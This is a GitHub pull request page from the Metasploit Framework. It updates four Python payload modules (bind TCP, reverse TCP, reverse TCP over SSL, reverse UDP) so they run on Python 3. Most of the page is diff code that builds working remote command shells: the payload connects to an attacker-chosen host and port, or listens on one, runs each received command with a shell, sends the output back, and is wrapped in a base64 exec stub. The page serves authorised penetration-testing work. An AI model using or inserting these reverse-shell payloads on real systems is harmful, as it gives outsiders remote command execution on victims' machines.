Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

fix #14207, fix python/shell_reverse_tcp on python3 #14325

Merged
merged 10 commits into from
Nov 23, 2020
Merged

fix #14207, fix python/shell_reverse_tcp on python3 #14325

Show file tree
Hide file tree
Changes from 4 commits
Commits
Show all changes
10 commits
Select commit Hold shift + click to select a range
41d984e
fix #14207, fix python/shell_reverse_tcp on python3
timwr Oct 30, 2020
766fbd9
fix python/shell_bind_tcp on python3
timwr Nov 5, 2020
06d109d
update payload cached sizes
timwr Nov 5, 2020
65d1cc5
update compatibility in description
timwr Nov 5, 2020
856239f
Apply code golf suggestions from acammack
timwr Nov 6, 2020
552cd5a
python code golf and convert to squiggly heredoc
timwr Nov 6, 2020
9613897
fix python/shell_reverse_udp
timwr Nov 17, 2020
b4b2ae4
add heredoc awareness to msftidy
timwr Nov 17, 2020
14048fc
fix shell_reverse_udp payload cached size
timwr Nov 17, 2020
6bdc7a1
Tweak the Python single payload descriptions
smcintyre-r7 Nov 20, 2020
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
17 changes: 8 additions & 9 deletions modules/payloads/singles/python/shell_bind_tcp.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -5,15 +5,16 @@

module MetasploitModule

CachedSize = 381
CachedSize = 557

include Msf::Payload::Single
include Msf::Payload::Python
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
super(merge_info(info,
'Name' => 'Command Shell, Bind TCP (via python)',
'Description' => 'Creates an interactive shell via python, encodes with base64 by design',
'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+',
'Author' => 'mumbai',
'License' => MSF_LICENSE,
'Platform' => 'python',
Expand All @@ -35,22 +36,20 @@ def generate

def command_string
cmd = ''
dead = Rex::Text.rand_text_alpha(2)
dead = Rex::Text.rand_text_alpha(3)
# Set up the socket
cmd << "import socket,os\n"
cmd << "import socket,subprocess\n"
timwr marked this conversation as resolved.
Show resolved Hide resolved
cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
timwr marked this conversation as resolved.
Show resolved Hide resolved
cmd << "so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))\n"
cmd << "so.listen(1)\n"
cmd << "so,addr=so.accept()\n"
cmd << "#{dead}=False\n"
cmd << "while not #{dead}:\n"
cmd << "\tdata=so.recv(1024)\n"
cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
timwr marked this conversation as resolved.
Show resolved Hide resolved
cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
cmd << "\tso.send(stdout_value)\n"

# base64
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
cmd
py_create_exec_stub(cmd)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

2.7 works, however I'm getting an error due to os.popen3 not being available on Python3. Looks like that will need to be updated too.

end
end
18 changes: 8 additions & 10 deletions modules/payloads/singles/python/shell_reverse_tcp.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -9,15 +9,16 @@

module MetasploitModule

CachedSize = 401
CachedSize = 573

include Msf::Payload::Single
include Msf::Payload::Python
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
super(merge_info(info,
'Name' => 'Command Shell, Reverse TCP (via python)',
'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3',
'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+',
'Author' => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
'License' => MSF_LICENSE,
'Platform' => 'python',
Expand Down Expand Up @@ -45,24 +46,21 @@ def generate
#
def command_string
cmd = ''
dead = Rex::Text.rand_text_alpha(2)
dead = Rex::Text.rand_text_alpha(3)
# Set up the socket
cmd << "import socket,os\n"
cmd << "import socket,subprocess\n"
cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
# The actual IO
cmd << "#{dead}=False\n"
cmd << "while not #{dead}:\n"
cmd << "\tdata=so.recv(1024)\n"
cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
cmd << "\tso.send(stdout_value)\n"

# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"

cmd
py_create_exec_stub(cmd)
end
end

10 changes: 4 additions & 6 deletions modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -9,15 +9,16 @@

module MetasploitModule

CachedSize = 561
CachedSize = 621

include Msf::Payload::Single
include Msf::Payload::Python
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
super(merge_info(info,
'Name' => 'Command Shell, Reverse TCP SSL (via python)',
'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+',
'Author' => 'RageLtMan <rageltman[at]sempervictus>',
'License' => BSD_LICENSE,
'Platform' => 'python',
Expand Down Expand Up @@ -60,10 +61,7 @@ def command_string
cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
cmd += "\ts.sendall(stdout_value)\n"

# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"

cmd
py_create_exec_stub(cmd)
smcintyre-r7 marked this conversation as resolved.
Show resolved Hide resolved
end
end

16 changes: 7 additions & 9 deletions modules/payloads/singles/python/shell_reverse_udp.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -9,9 +9,10 @@

module MetasploitModule

CachedSize = 397
CachedSize = 573

include Msf::Payload::Single
include Msf::Payload::Python
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
Expand Down Expand Up @@ -45,24 +46,21 @@ def generate
#
def command_string
cmd = ''
dead = Rex::Text.rand_text_alpha(2)
dead = Rex::Text.rand_text_alpha(3)
# Set up the socket
cmd << "import socket,os\n"
cmd << "import socket,subprocess\n"
cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n"
cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
# The actual IO
cmd << "#{dead}=False\n"
cmd << "while not #{dead}:\n"
cmd << "\tdata=so.recv(1024)\n"
cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
cmd << "\tso.send(stdout_value)\n"

# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"

cmd
py_create_exec_stub(cmd)
smcintyre-r7 marked this conversation as resolved.
Show resolved Hide resolved
end

end
Expand Down